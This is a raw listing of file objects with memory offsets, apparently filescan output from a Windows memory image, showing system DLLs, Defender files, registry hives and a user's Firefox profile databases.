+0x918b75c250f0	\Windows\appcompat\Programs\Amcache.hve.LOG1	216
+0x918b75c25280	\Windows\System32\en-US\winhttp.dll.mui	216
+0x918b75c25410	\Windows\Fonts\seguisb.ttf	216
+0x918b75c255a0	\Windows\System32\catsrvut.dll	216
+0x918b75c25730	\Windows\appcompat\Programs\Amcache.hve	216
+0x918b75c258c0	\$Directory	216
+0x918b75c25a50	\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx	216
+0x918b75c25d70	\Windows\System32\wbem\WmiPrvSE.exe	216
+0x918b75c26090	\Windows\System32\mfcsubs.dll	216
+0x918b75c26220	\Windows\System32\Windows.StateRepositoryCore.dll	216
+0x918b75c263b0	\Windows\Registration\R000000000006.clb	216
+0x918b75c26540	\Windows\Fonts\consola.ttf	216
+0x918b75c266d0	\Windows\System32\notepad.exe	216
+0x918b75c26860	\Windows\System32\AppxAllUserStore.dll	216
+0x918b75c269f0	\Windows\System32\catsrvps.dll	216
+0x918b75c26d10	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b75c26ea0	\Windows\System32\directmanipulation.dll	216
+0x918b75c271c0	\Windows\System32\en-US\notepad.exe.mui	216
+0x918b75c27800	\Windows\System32\Windows.UI.Xaml.InkControls.dll	216
+0x918b75c27990	\$Directory	216
+0x918b75c27b20	\CMApi	216
+0x918b75c27cb0	\Windows\System32\Windows.UI.Xaml.Maps.dll	216
+0x918b75c28160	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b75c287a0	\$Directory	216
+0x918b75c28930	\Windows\System32\msxml6.dll	216
+0x918b75c28ac0	\Windows\System32\msxml6r.dll	216
+0x918b75c28c50	\$Directory	216
+0x918b75c28de0	\Windows\System32\Windows.UI.Xaml.Phone.dll	216
+0x918b75c29100	\Windows\System32\wbem\cimwin32.dll	216
+0x918b75c29290	\CMApi	216
+0x918b75c295b0	\Windows\System32	216
+0x918b75c29740	\Windows\System32\spp\store\2.0\data.dat	216
+0x918b75c298d0	\Windows\System32\en-US\notepad.exe.mui	216
+0x918b75c29a60	\Windows\Registration\R000000000006.clb	216
+0x918b75c29d80	\Windows\System32\framedynos.dll	216
+0x918b75c2a0a0	\Windows\System32\en-US\user32.dll.mui	216
+0x918b75c2a230	\Windows\Registration\R000000000006.clb	216
+0x918b75c2a3c0	\Windows\System32\sppwinob.dll	216
+0x918b75c2aa00	\Windows\Fonts\StaticCache.dat	216
+0x918b75c2ad20	\Windows\System32\fltLib.dll	216
+0x918b75c2aeb0	\Windows\Fonts\mmrtextb.ttf	216
+0x918b75c2b680	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite	216
+0x918b75c2b810	\Windows\Registration\R000000000006.clb	216
+0x918b75c2bcc0	\Windows\System32\wscapi.dll	216
+0x918b75c2be50	\Windows\Fonts\seguisb.ttf	216
+0x918b75c2c300	\Windows\Registration\R000000000006.clb	216
+0x918b75c2c490	\CMApi	216
+0x918b75c2c620	\Windows\System32\Windows.UI.Xaml.Controls.dll	216
+0x918b75c2c7b0	\Windows\System32\pkeyhelper.dll	216
+0x918b75c2c940	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b75c2c970	질痂醋￿질痂醋￿	0
+0x918b75c2cc60	\Windows\System32\wbem\en-US\cimwin32.dll.mui	216
+0x918b75c2cdf0	\Windows\SystemResources\notepad.exe.mun	216
+0x918b75c2d430	\Windows\explorer.exe	216
+0x918b75c2d750	\$Directory	216
+0x918b75c2d8e0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite-shm	216
+0x918b75c2da70	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite-shm	216
+0x918b75c2dc00	\Users\santa\ntuser.dat.LOG1	216
+0x918b75c2e3d0	\Windows\Registration\R000000000006.clb	216
+0x918b75c2e560	\$Directory	216
+0x918b75c2e6f0	\Windows\System32\normidna.nls	216
+0x918b75c2e880	\Windows\System32\CertEnroll.dll	216
+0x918b75c2eba0	\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx	216
+0x918b75c2ed30	\$Directory	216
+0x918b75c2eec0	\$Directory	216
+0x918b75c2f1e0	\Windows\Fonts\segoeuisl.ttf	216
+0x918b75c2f690	\Users\santa\NTUSER.DAT	216
+0x918b75c2f820	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite-wal	216
+0x918b75c2fb40	\$Directory	216
+0x918b75c2fcd0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite	216
+0x918b75c2fe60	\$Directory	216
+0x918b75c30180	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite-wal	216
+0x918b75c30310	\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx	216
+0x918b75c304a0	\Windows\Fonts\StaticCache.dat	216
+0x918b75c307c0	\$Directory	216
+0x918b75c30950	\$Directory	216
+0x918b75c30c70	\$Directory	216
+0x918b75c30e00	\Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG2	216
+0x918b75c31120	\Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1	216
+0x918b75c312b0	\$Directory	216
+0x918b75c31440	\Device\HarddiskVolume4\Users\santa\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b75c315d0	\Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat{80f87ee9-850a-11ee-b495-000c29cb6a43}.TMContainer00000000000000000002.regtrans-ms	216
+0x918b75c31760	\$Directory	216
+0x918b75c318f0	\Windows\System32\IDStore.dll	216
+0x918b75c31c10	\Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat{80f87ee9-850a-11ee-b495-000c29cb6a43}.TMContainer00000000000000000001.regtrans-ms	216
+0x918b75c31da0	\$Directory	216
+0x918b75c320c0	\Users\santa\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms	216
+0x918b75c32250	\Device\HarddiskVolume4\Users\santa\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b75c32570	\Users\santa\ntuser.dat.LOG2	216
+0x918b75c32890	\$Directory	216
+0x918b75c32a20	\Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat	216
+0x918b75c32bb0	\$Directory	216
+0x918b75c32d40	\Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat{80f87ee9-850a-11ee-b495-000c29cb6a43}.TM.blf	216
+0x918b75c32ed0	\Users\santa\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM.blf	216
+0x918b75c331f0	\$Directory	216
+0x918b75c33380	\$Directory	216
+0x918b75c33510	\$Directory	216
+0x918b75c33830	\Users\santa\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms	216
+0x918b75c339c0	\Windows\System32\Windows.CloudStore.dll	216
+0x918b75c33b50	\CMApi	216
+0x918b75c33ce0	\Windows\System32\en-US\combase.dll.mui	216
+0x918b75c33e70	\Windows\System32\en-US\dps.dll.mui	216
+0x918b75c34190	\Windows\System32\en-US\winmmbase.dll.mui	216
+0x918b75c34320	\$Directory	216
+0x918b75c344b0	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b75c34640	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b75c34960	\Windows\System32\en-US\sysmain.dll.mui	216
+0x918b75c34c80	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b75c34e10	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite-wal	216
+0x918b75c352c0	\$Directory	216
+0x918b75c355e0	\$Directory	216
+0x918b75c35770	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b75c35900	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\content-prefs.sqlite	216
+0x918b75c35a90	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd	216
+0x918b75c35c20	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd	216
+0x918b75c35db0	\$Directory	216
+0x918b75c360d0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite	216
+0x918b75c36260	\Windows\System32\svchost.exe	216
+0x918b75c363f0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite	216
+0x918b75c36580	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite-wal	216
+0x918b75c36710	\Windows\Registration\R000000000006.clb	216
+0x918b75c36a30	\Windows\System32	216
+0x918b75c36bc0	\$Directory	216
+0x918b75c36d50	\$Directory	216
+0x918b75c37200	\Windows\System32\SmartCardBackgroundPolicy.dll	216
+0x918b75c376b0	\Windows\Fonts\palab.ttf	216
+0x918b75c37840	\Windows\Fonts\pala.ttf	216
+0x918b75c37cf0	\Windows\Fonts\palabi.ttf	216
+0x918b75c37e80	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm	216
+0x918b75c38330	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.LockApp_10.0.18362.1_neutral__cw5n1h2txyewy\ActivationStore.dat	216
+0x918b75c384c0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b75c387e0	\gecko.4576.3988.14086781544336770055	216
+0x918b75c38b00	\Windows\System32\sppobjs.dll	216
+0x918b75c392d0	\$Directory	216
+0x918b75c39780	\gecko.4576.3988.14086781544336770055	216
+0x918b75c39910	\Windows\Fonts\times.ttf	216
+0x918b75c39c30	\Windows\System32\en-US\lsm.dll.mui	216
+0x918b75c3a0e0	\Windows\System32\wbem\WmiPrvSE.exe	216
+0x918b75c3a270	\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx	216
+0x918b75c3a590	\$Directory	216
+0x918b75c3a720	\Windows\Fonts\palai.ttf	216
+0x918b75c3aa40	\Windows\System32\en-US\user32.dll.mui	216
+0x918b75c3abd0	\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Operational.evtx	216
+0x918b75c3b080	\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx	216
+0x918b75c3b530	\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx	216
+0x918b75c3b6c0	\Windows\System32\certca.dll	216
+0x918b75c3b850	\Windows\Fonts\segoescb.ttf	216
+0x918b75c3bb70	\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx	216
+0x918b75c3bd00	\Windows\System32	216
+0x918b75c3be90	\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx	216
+0x918b75c3c1b0	\$Directory	216
+0x918b75c3c340	\Windows\Registration\R000000000006.clb	216
+0x918b75c3c4d0	\Windows\Fonts\segoeprb.ttf	216
+0x918b75c3c660	\Windows\System32\pdh.dll	216
+0x918b75c3c980	\Windows\System32\AppXDeploymentServer.dll	216
+0x918b75c3cca0	\Windows\System32\wbem\WmiPerfClass.dll	216
+0x918b75c3ce30	\Windows\Fonts\segoesc.ttf	216
+0x918b75c3d790	\Windows\System32\dmcmnutils.dll	216
+0x918b75c3d920	\Windows\System32\omadmapi.dll	216
+0x918b75c3dab0	\$Directory	216
+0x918b75c3dc40	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpRtp.dll	216
+0x918b75c3ddd0	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\NisSrv.exe	216
+0x918b75c3f090	\ProgramData\Microsoft\Windows Defender\Scans\MpDiag.bin	216
+0x918b75c3f540	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpCommu.dll	216
+0x918b75c3f6d0	\Windows\System32\mdmregistration.dll	216
+0x918b75c3f860	\ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager\80A0E259-2BD8-4DD7-A23C-FCBC9D6451B7-0.bin	216
+0x918b75c40800	\Windows\System32\mshtml.dll	216
+0x918b75c412f0	\Windows\System32\iri.dll	216
+0x918b75c42290	\ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpengine.dll	216
+0x918b75c42740	\$Directory	216
+0x918b75c430a0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b75c43550	\Users\santa\AppData\Local\Microsoft\Windows\Burn	216
+0x918b75c436e0	\Windows\System32\en-US\mshtml.dll.mui	216
+0x918b75d77150	\Windows\ImmersiveControlPanel\SystemSettings.exe	216
+0x918b75d772e0	\Windows\Microsoft.NET\Framework64\v4.0.30319\CORPerfMonExt.dll	216
+0x918b75d77470	\Windows\System32\ucrtbase_clr0400.dll	216
+0x918b75d77600	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.67	216
+0x918b75d77790	\$Directory	216
+0x918b75d77920	\Windows\System32\en-US\ESENT.dll.mui	216
+0x918b75d77950	禨痗醋￿禨痗醋￿	0
+0x918b75d77ab0	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.E6	216
+0x918b75d77c40	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.DB	216
+0x918b75d77dd0	\ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpavdlta.vdm	216
+0x918b75d780f0	\Windows\Microsoft.NET\Framework64\v4.0.30319\PerfCounter.dll	216
+0x918b75d78280	\Windows\System32\WofUtil.dll	216
+0x918b75d785a0	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.A0	216
+0x918b75d78730	\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb	216
+0x918b75d788c0	\Windows\System32\vcruntime140_clr0400.dll	216
+0x918b75d78a50	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.6C	216
+0x918b75d78d70	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.80	216
+0x918b75d79090	\ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpasbase.vdm	216
+0x918b75d79220	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.87	216
+0x918b75d79540	\ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpavbase.vdm	216
+0x918b75d796d0	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.7E	216
+0x918b75d79860	\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb	216
+0x918b75d79b80	\ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpasdlta.vdm	216
+0x918b75d79d10	\Program Files\Windows Defender\en-US\shellext.dll.mui	216
+0x918b75d79ea0	\Windows\System32\mscoree.dll	216
+0x918b75d7a1c0	\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll	216
+0x918b75d7a350	\Windows\System32\svchost.exe	216
+0x918b75d7a4e0	\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb	216
+0x918b75d7a670	\Windows\System32\en-US\ESENT.dll.mui	216
+0x918b75d7ae40	\Windows\System32\ssdpsrv.dll	216
+0x918b75d7b2f0	\Windows\System32\upnp.dll	216
+0x918b75d7b610	\Endpoint	216
+0x918b75d7b7a0	\Endpoint	216
+0x918b75d7b930	\Endpoint	216
+0x918b75d7bac0	\Endpoint	216
+0x918b75d7bc50	\Endpoint	216
+0x918b75d7c100	\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb	216
+0x918b75d7c290	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm	216
+0x918b75d7c420	\Windows\System32	216
+0x918b75d7c740	\Endpoint	216
+0x918b75d7ca60	\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb.jfm	216
+0x918b75d7cbf0	\Endpoint	216
+0x918b75d7d0a0	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b75d7d230	\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb.jfm	216
+0x918b75d7d3c0	\Endpoint	216
+0x918b75d7d6e0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b75d7d870	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.7C	216
+0x918b75d7da00	\Windows\System32\winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx	216
+0x918b75d7db90	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.83	216
+0x918b75d7dd20	\CMApi	216
+0x918b75d7e1d0	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.79	216
+0x918b75d7e4f0	\CMNotify	216
+0x918b75d7e680	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b75d7e810	\Windows\System32\en-US\themeui.dll.mui	216
+0x918b75d7e9a0	\$Directory	216
+0x918b75d7eb30	\Windows\System32\en-US\sysmain.dll.mui	216
+0x918b75d7ecc0	\Windows\Fonts\times.ttf	216
+0x918b75d7f170	\ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.01	216
+0x918b75d7f300	\$Directory	216
+0x918b75d7f620	\CMNotify	216
+0x918b75d7f7b0	\CMNotify	216
+0x918b75d7f940	\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe	216
+0x918b75d7fad0	\CMNotify	216
+0x918b75d7fc60	\$Directory	216
+0x918b75d7fdf0	\Windows\Prefetch\PfPre_e075aaec.mkd	216
+0x918b75d80110	\CMNotify	216
+0x918b75d802a0	\Windows\System32\en-US\Windows.Storage.Search.dll.mui	216
+0x918b75d80750	\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db	216
+0x918b75d80a70	\$ConvertToNonresident	216
+0x918b75d80c00	\Windows\ImmersiveControlPanel\resources.pri	216
+0x918b75d80d90	\ProgramData\Microsoft\Windows Defender\Definition Updates\Updates	216
+0x918b75d810b0	\$Directory	216
+0x918b75d81240	\Windows\System32\en-US\combase.dll.mui	216
+0x918b75d813d0	\CMApi	216
+0x918b75d81560	\$Directory	216
+0x918b75d816f0	\Windows\en-US\explorer.exe.mui	216
+0x918b75d81880	\Windows\System32\WinMetadata\Windows.Foundation.winmd	216
+0x918b75d81a10	\$Directory	216
+0x918b75d81ba0	\Windows\System32\winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx	216
+0x918b75d81d30	\ProgramData\Microsoft\Windows Defender\IMpService77BDAF73-B396-481F-9042-AD358843EC24.lock	216
+0x918b75d81ec0	\Windows\System32\Windows.StateRepositoryPS.dll	216
+0x918b75d821e0	\Windows\System32\cryptnet.dll	216
+0x918b75d82500	\lsass	216
+0x918b75d82690	\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db-shm	216
+0x918b75d829b0	\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db-wal	216
+0x918b75d829e0	⨸痘醋￿⨸痘醋￿	29716
+0x918b75d82b40	\ProgramData\Microsoft\Windows Defender\IMpDlpService77BDAF73-B396-481F-9042-AD358843EC24.lock	216
+0x918b75d82cd0	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows-managed.dll	216
+0x918b75d83310	\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db	216
+0x918b75d834a0	\$Directory	216
+0x918b75d837c0	\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx	216
+0x918b75d83950	\Windows\System32	216
+0x918b75d83ae0	\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\Safety\network\local\sinkholeCache	216
+0x918b75d83c70	\Windows\System32\en-US\QuietHours.dll.mui	216
+0x918b75d83e00	\Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.32530.0_x64__8wekyb3d8bbwe\vccorlib140_app.dll	216
+0x918b75d84120	\gecko.4576.3988.9916641259275048487	216
+0x918b75d842b0	\gecko.4576.3988.9916641259275048487	216
+0x918b75d84440	\Windows\System32\NotificationController.dll	216
+0x918b75d845d0	\Windows\System32\en-US\lsm.dll.mui	216
+0x918b75d84760	\CMApi	216
+0x918b75d848f0	\Windows\System32\wininet.dll	216
+0x918b75d84a80	\Windows\System32	216
+0x918b75d84c10	\$Directory	216
+0x918b75d850c0	\Windows\System32\sihost.exe	216
+0x918b75d85250	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\NisSrv.exe	216
+0x918b75d853e0	\$Directory	216
+0x918b75d85570	\CMNotify	216
+0x918b75d85700	\Windows\Registration\R000000000006.clb	216
+0x918b75d85890	\Windows\System32\svchost.exe	216
+0x918b75d85a20	\$Directory	216
+0x918b75d861f0	\Windows\System32	216
+0x918b75d86510	\Windows\System32\en-US\winsrv.dll.mui	216
+0x918b75d866a0	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b75d86830	\Windows\System32\en-US\user32.dll.mui	216
+0x918b75d869c0	\Windows\System32\cdpusersvc.dll	216
+0x918b75d86b50	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.log	216
+0x918b75d87320	\Windows\Fonts\SitkaB.ttc	216
+0x918b75d874b0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b75d87640	\Windows\System32\en-US\taskhostw.exe.mui	216
+0x918b75d877d0	\$Directory	216
+0x918b75d87960	\Windows\System32	216
+0x918b75d87990	秨痘醋￿秨痘醋￿	0
+0x918b75d87af0	\Windows\System32\DesktopShellExt.dll	216
+0x918b75d87c80	\$Directory	216
+0x918b75d87e10	\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.54.4001.0_x64__8wekyb3d8bbwe	216
+0x918b75d882c0	\Windows\Registration\R000000000006.clb	216
+0x918b75d88450	\$Directory	216
+0x918b75d88770	\$Directory	216
+0x918b75d88900	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb	216
+0x918b75d88a90	\Windows\System32\MsCtfMonitor.dll	216
+0x918b75d88c20	\Windows\System32\PlaySndSrv.dll	216
+0x918b75d890d0	\Windows\System32\WpnUserService.dll	216
+0x918b75d89260	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cert9.db	216
+0x918b75d893f0	\Dev\Query	216
+0x918b75d89580	\Windows\System32\taskhostw.exe	216
+0x918b75d898a0	\Dev\Query	216
+0x918b75d89a30	\Windows\Registration\R000000000006.clb	216
+0x918b75d89bc0	\$Directory	216
+0x918b75d89d50	\Windows\System32\Windows.Networking.Connectivity.dll	216
+0x918b75d8a200	\CMApi	216
+0x918b75d8a520	\Windows\System32\QuietHours.dll	216
+0x918b75d8a6b0	\Windows\System32\ExecModelClient.dll	216
+0x918b75d8a9d0	\Windows\System32\ClipboardServer.dll	216
+0x918b75d8ab60	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b75d8acf0	\Windows\System32\SecureTimeAggregator.dll	216
+0x918b75d8ae80	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	216
+0x918b75d8b1a0	\Windows\System32\WinBioPlugIns\FaceBootstrapAdapter.dll	216
+0x918b75d8b4c0	\Windows\System32\msutb.dll	216
+0x918b75d8b650	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b75d8b7e0	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b75d8b970	\Windows\System32\ActivationManager.dll	216
+0x918b75d8bb00	\Windows\System32\wcmapi.dll	216
+0x918b75d8bc90	\Windows\System32\ncryptsslp.dll	216
+0x918b75d8c140	\Windows\System32\ncryptprov.dll	216
+0x918b75d8c2d0	\Windows\System32\dssenh.dll	216
+0x918b75d8c460	\Windows\System32\TabSvc.dll	216
+0x918b75d8c780	\$Directory	216
+0x918b75d8caa0	\CMNotify	216
+0x918b75d8cc30	\Windows\System32\ctfmon.exe	216
+0x918b75d8cdc0	\Windows\System32\en-US\MsCtfMonitor.dll.mui	216
+0x918b75d8d0e0	\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx	216
+0x918b75d8d400	\CMNotify	216
+0x918b75d8d590	\Windows\System32\TokenBroker.dll	216
+0x918b75d8d720	\Windows\System32	216
+0x918b75d8da40	\$Directory	216
+0x918b75d8dbd0	\Windows\System32\en-US\ctfmon.exe.mui	216
+0x918b75d8dd60	\Windows\System32\AppointmentActivation.dll	216
+0x918b75d8def0	\Users\santa\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-shm	216
+0x918b75d8e530	\Users\santa\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-wal	216
+0x918b75d8e6c0	\Users\santa\AppData\Local\Microsoft\Windows\WebCache\V01.loglogog	216
+0x918b75d8e9e0	\Windows\System32\Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll	216
+0x918b75d8eb70	\Windows\System32\en-US\ESENT.dll.mui	216
+0x918b75d8f1b0	\Users\santa\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat	216
+0x918b75d8f340	\Windows\System32\BitsProxy.dll	216
+0x918b75d8f4d0	\$Directory	216
+0x918b75d8f660	\CMApi	216
+0x918b75d8f7f0	\$Directory	216
+0x918b75d8f980	\Windows\System32\modernexecserver.dll	216
+0x918b75d8fb10	\Windows\System32\en-US\winmm.dll.mui	216
+0x918b75d8fca0	\$Directory	216
+0x918b75d8fe30	\Users\santa\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db	216
+0x918b75d90150	\Windows\System32\InputService.dll	216
+0x918b75d90600	\Endpoint	216
+0x918b75d90790	\Windows\System32\SebBackgroundManagerPolicy.dll	216
+0x918b75d90920	\Windows\System32	216
+0x918b75d90c40	\Windows\System32\svchost.exe	216
+0x918b75d910f0	\Users\santa\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm	216
+0x918b75d91280	\Windows\System32\en-US\localspl.dll.mui	216
+0x918b75d91410	\Windows\System32\Windows.Internal.Graphics.Display.DisplayColorManagement.dll	216
+0x918b75d915a0	\Windows\System32\ACPBackgroundManagerPolicy.dll	216
+0x918b75d91730	\Windows\System32\Windows.ApplicationModel.dll	216
+0x918b75d918c0	\Windows\System32\Windows.Security.Authentication.Web.Core.dll	216
+0x918b75d91a50	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b75d91be0	\LOCAL\cubeb-pipe-4576-13	216
+0x918b75d91d70	\Windows\System32\WindowManagement.dll	216
+0x918b75d923b0	\Windows\System32\perfdisk.dll	216
+0x918b75d92540	\Windows\System32\execmodelproxy.dll	216
+0x918b75d926d0	\Windows\System32\en-US\cmd.exe.mui	216
+0x918b75d92860	\Windows\System32\PrintIsolationProxy.dll	216
+0x918b75d929f0	\Windows\System32\tokenbinding.dll	216
+0x918b75d92b80	\Windows\System32\BackgroundMediaPolicy.dll	216
+0x918b75d92d10	\CMApi	216
+0x918b75d92ea0	\Windows\System32\notificationplatformcomponent.dll	216
+0x918b75d931c0	\Windows\System32\TextInputMethodFormatter.dll	216
+0x918b75d93350	\Windows\System32\ShareHost.dll	216
+0x918b75d93800	\Windows\System32\localspl.dll	216
+0x918b75d93990	\CMApi	216
+0x918b75d93cb0	\Windows\System32\spoolss.dll	216
+0x918b75d93e40	\Windows\System32\dui70.dll	216
+0x918b75d942f0	\Endpoint	216
+0x918b75d94480	\Windows\System32\perfos.dll	216
+0x918b75d94610	\Windows\System32\sfc_os.dll	216
+0x918b75d94930	\Windows\Registration\R000000000006.clb	216
+0x918b75d94c50	\Windows\System32\FXSMON.dll	216
+0x918b75d95100	\Windows\System32\rasman.dll	216
+0x918b75d95420	\CMNotify	216
+0x918b75d955b0	\Windows\System32\AppContracts.dll	216
+0x918b75d95740	\Windows\System32\AppMon.dll	216
+0x918b75d958d0	\Windows\System32\winspool.drv	216
+0x918b75d95a60	\Program Files (x86)\Mozilla Firefox	216
+0x918b75d95bf0	\Windows\System32\wpnprv.dll	216
+0x918b75d95d80	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b75d96550	\$Directory	216
+0x918b75d96870	\CMApi	216
